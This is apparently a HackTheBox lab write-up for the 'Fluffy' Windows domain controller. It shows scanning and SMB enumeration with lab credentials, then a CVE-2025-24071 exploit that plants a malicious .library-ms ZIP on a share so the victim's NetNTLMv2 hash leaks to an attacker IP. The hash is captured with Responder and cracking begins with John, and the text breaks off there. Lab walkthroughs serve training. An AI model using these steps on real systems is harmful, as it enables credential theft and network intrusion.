Fluffy
Writeup for HackTheBox Fluffy machine
Executive Summary
Fluffy is a Windows AD DC involving client-side spoofing, group delegation abuse, and AD CS misconfigurations. The attack chain is as follows:
- CVE-2025-24071 → Hash Capture — Enumerate writable
ITSMB share with providedj.fleischmancreds. Upload a malicious.library-msfile in a ZIP; when an admin agent parses it, capture NetNTLMv2 hash ofp.agilaand crack it offline. - Group Delegation + Shadow Credentials → User — With
p.agilacreds, usebloodyADto join theService Accountsgroup. Shadow Credentials onwinrm_svcto retrieve its NT hash; access user flag via WinRM. - GenericWrite → ESC16 → DA —
ca_svchasGenericWriteonca_svc. Temporarily change its UPN toadministrator, request a certificate from a standard template, then change the UPN back. Authenticate with the cert to retrieve Administrator’s NT hash; Pass-the-Hash to DA.
Reconnaissance
Network Scanning (Nmap)
We begin by defining the target IP address and performing a two-stage port scan using Nmap to identify open TCP ports and run detailed service banner detection and default script scans.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ IP=10.10.11.69
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ port=$(sudo nmap -p- $IP --min-rate 10000 | grep open | cut -d'/' -f1 | tr '\n' ',' )
[sudo] password for kali:
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ sudo nmap -sC -sV -vv -p $port $IP -oN fluffy.scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-25 07:25 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:25
Completed NSE at 07:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:25
Completed NSE at 07:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:25
Completed NSE at 07:25, 0.00s elapsed
Initiating Ping Scan at 07:25
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 07:25, 0.35s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:25
Completed Parallel DNS resolution of 1 host. at 07:25, 0.00s elapsed
Initiating SYN Stealth Scan at 07:25
Scanning 10.10.11.69 [17 ports]
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 49677/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 49666/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Discovered open port 49678/tcp on 10.10.11.69
Discovered open port 49681/tcp on 10.10.11.69
Discovered open port 5985/tcp on 10.10.11.69
Discovered open port 9389/tcp on 10.10.11.69
Discovered open port 49730/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 49695/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Completed SYN Stealth Scan at 07:25, 0.71s elapsed (17 total ports)
Initiating Service scan at 07:25
Scanning 17 services on 10.10.11.69
Completed Service scan at 07:26, 59.64s elapsed (17 services on 1 host)
NSE: Script scanning 10.10.11.69.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:26
NSE Timing: About 99.96% done; ETC: 07:26 (0:00:00 remaining)
Completed NSE at 07:27, 40.12s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 3.64s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 0.00s elapsed
Nmap scan report for 10.10.11.69
Host is up, received echo-reply ttl 127 (0.34s latency).
Scanned at 2025-05-25 07:25:24 EDT for 104s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-25 11:34:05Z)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T11:35:49+00:00; +8m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5
| MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0
| MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO
| KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4
| bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3
| ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa
| 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8
| EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw
| ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna
| 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
212: | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp
213: | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
214: | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
215: | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
216: | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD
217: | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
218: | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI
219: | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE
220: | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1
221: | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm
222: | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o
223: | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk
224: | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET
225: | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc
226: | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
227: |_-----END CERTIFICATE-----
228: 445/tcp open microsoft-ds? syn-ack ttl 127
229: 464/tcp open kpasswd5? syn-ack ttl 127
230: 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
231: 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb., Site: Default-First-Site-Name)
232: |_ssl-date: 2025-05-25T11:35:49+00:00; +8m44s from scanner time.
233: | ssl-cert: Subject: commonName=DC01.fluffy.htb
234: | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
235: | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
236: | Public Key type: rsa
237: | Public Key bits: 2048
238: | Signature Algorithm: sha256WithRSAEncryption
239: | Not valid before: 2025-04-17T16:04:17
240: | Not valid after: 2026-04-17T16:04:17
241: | MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
242: | SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
243: | -----BEGIN CERTIFICATE-----
244: | MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
245: | ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5
246: | MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0
247: | MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI
248: | hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO
249: | KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4
250: | bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3
251: | ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa
252: | 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8
253: | EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw
254: | ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
255: | AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
256: | AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
257: | AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
258: | hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna
259: | 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI
260: | BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB
261: | LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
262: | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp
263: | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
264: | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
265: | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
266: | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD
267: | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
268: | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI
269: | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE
270: | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1
271: | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm
272: | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o
273: | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk
274: | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET
275: | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc
276: | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
277: |_-----END CERTIFICATE-----
278: 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb., Site: Default-First-Site-Name)
279: |_ssl-date: 2025-05-25T11:35:49+00:00; +8m44s from scanner time.
280: | ssl-cert: Subject: commonName=DC01.fluffy.htb
281: | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
282: | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
283: | Public Key type: rsa
284: | Public Key bits: 2048
285: | Signature Algorithm: sha256WithRSAEncryption
286: | Not valid before: 2025-04-17T16:04:17
287: | Not valid after: 2026-04-17T16:04:17
288: | MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
289: | SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
290: | -----BEGIN CERTIFICATE-----
291: | MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
292: | ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5
293: | MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0
294: | MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI
295: | hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO
296: | KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4
297: | bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3
298: | ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa
299: | 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8
300: | EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw
301: | ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
302: | AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
303: | AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
304: | AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
305: | hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna
306: | 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI
307: | BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB
308: | LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
309: | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp
310: | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
311: | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
312: | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
313: | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD
314: | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
315: | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI
316: | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE
317: | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1
318: | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm
319: | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o
320: | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk
321: | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET
322: | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc
323: | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
324: |_-----END CERTIFICATE-----
325: 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
326: |_http-title: Not Found
327: |_http-server-header: Microsoft-HTTPAPI/2.0
328: 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
329: 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
330: 49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
331: 49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
332: 49681/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
333: 49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
334: 49730/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
335: Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-25T11:35:05
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 53865/tcp): CLEAN (Timeout)
| Check 2 (port 19123/tcp): CLEAN (Timeout)
| Check 3 (port 5751/udp): CLEAN (Timeout)
| Check 4 (port 54887/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8m42s, deviation: 2s, median: 8m42s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.05 seconds
Raw packets sent: 21 (900B) | Rcvd: 18 (776B)
Initial Access & SMB Enumeration
Active Directory User Enumeration
We validate the provided credentials for j.fleischman and enumerate domain users using netexec over SMB:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ netexec smb $IP -u 'j.fleischman' -p J0elTHEM4n1990! --users
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.69 445 DC01 Administrator 2025-04-17 15:45:01 0 Built-in account for administering the computer/domain
SMB 10.10.11.69 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.69 445 DC01 krbtgt 2025-04-17 16:00:02 0 Key Distribution Center Service Account
SMB 10.10.11.69 445 DC01 ca_svc 2025-04-17 16:07:50 0
SMB 10.10.11.69 445 DC01 ldap_svc 2025-04-17 16:17:00 0
SMB 10.10.11.69 445 DC01 p.agila 2025-04-18 14:37:08 0
SMB 10.10.11.69 445 DC01 winrm_svc 2025-05-18 00:51:16 0
SMB 10.10.11.69 445 DC01 j.coffey 2025-04-19 12:09:55 0
SMB 10.10.11.69 445 DC01 j.fleischman 2025-05-16 14:46:55 0
SMB 10.10.11.69 445 DC01 [*] Enumerated 9 local users: FLUFFY
We generate a username list for brute force or mapping targets:
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ netexec smb $IP -u 'j.fleischman' -p J0elTHEM4n1990! --users | awk '/^SMB/ && $5 ~ /^[a-zA-Z0-9_.]+$/ { print $5 }' | tee -a username.txt
Administrator
Guest
krbtgt
ca_svc
ldap_svc
p.agila
winrm_svc
j.coffey
j.fleischman
Share Enumeration
We list SMB shares with netexec to locate accessible data directories.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ netexec smb $IP -u 'j.fleischman' -p J0elTHEM4n1990! --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
We have both READ and WRITE access to the IT share.
Examining Shared Loot
We connect to the IT share using smbclient and retrieve the files within it. We identify Upgrade_Notice.pdf and download it for investigation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ smbclient //$IP/IT -U fluffy.htb/j.fleischman%J0elTHEM4n1990!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 25 07:41:00 2025
.. D 0 Sun May 25 07:41:00 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 2069734 blocks available
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (17.1 KiloBytes/sec) (average 17.1 KiloBytes/sec)
smb: \>
The document details an upgrade notice and highlights file-handling spoofing vulnerabilities:
Exploiting CVE-2025-24071 (Forced SMB Authentication Hash Leak)
Vulnerability Mechanism
CVE-2025-24071 is a spoofing vulnerability in Windows File Explorer that allows an attacker to leak user NTLM authentication hashes. The vulnerability centers on .library-ms files (Windows Library Description files) containing reference schemas pointing to remote locations. When a user views a folder containing a crafted .library-ms file, or extracts it from a compressed archive, Windows Explorer attempts to parse the metadata properties and query the remote URL schema automatically. By pointing the target schema to a remote UNC path (e.g., \\attacker_ip\share), Windows Explorer automatically initiates an SMB connection, transmitting the current user’s NetNTLMv2 authentication exchange hash to the attacker-controlled IP.
Exploitation Setup
We generate a malicious .library-ms file packaged within a ZIP archive (exploit.zip) pointing back to our local machine’s IP (10.10.14.33).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~/HTB-machine/fluffy/CVE-2025-24071]
└─$ python3 exploit.py -i 10.10.14.33 -f shell
______ ____ ____ _______ ___ ___ ___ _____ ___ _ _ ___ ______ __
/ |\ \ / / | ____| |__ \ / _ \ |__ \ | ____| |__ \ | || | / _ \ |____ | /_ |
| ,----' \ \/ / | |__ ______ ) | | | | | ) | | |__ ______ ) | | || |_ | | | | / / | |
| | \ / | __| |______/ / | | | | / / |___ \ |______/ / |__ _| | | | | / / | |
| `----. \ / | |____ / /_ | |_| | / /_ ___) | / /_ | | | |_| | / / | |
\______| \__/ |_______| |____| \___/ |____| |____/ |____| |_| \___/ /_/ |_|
Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
by ThemeHackers
Creating exploit with filename: shell.library-ms
Target IP: 10.10.14.33
Generating library file...
✓ Library file created successfully
Creating ZIP archive...
✓ ZIP file created successfully
Cleaning up temporary files...
✓ Cleanup completed
Process completed successfully!
Output file: exploit.zip
Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.
Capturing and Cracking the NetNTLMv2 Hash
We start Responder to listen on the local tunnel interface (tun0) and capture inbound LLMNR, NBT-NS, and SMB requests.
1
2
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ sudo responder -I tun0 -v
We upload the crafted payload archive to the writable IT SMB share:
1
2
3
4
┌──(kali㉿kali)-[~/HTB-machine/fluffy/CVE-2025-24071]
└─$ smbclient //10.10.11.69/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip"
putting file exploit.zip as \exploit.zip (0.3 kb/s) (average 0.3 kb/s)
An administrative cleanup task or user activity triggers the file parsing. Responder successfully intercepts the inbound SMB authentication request from the user p.agila:
We save the intercepted hash to a file and crack it offline using John the Ripper and the rockyou.txt wordlist:
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
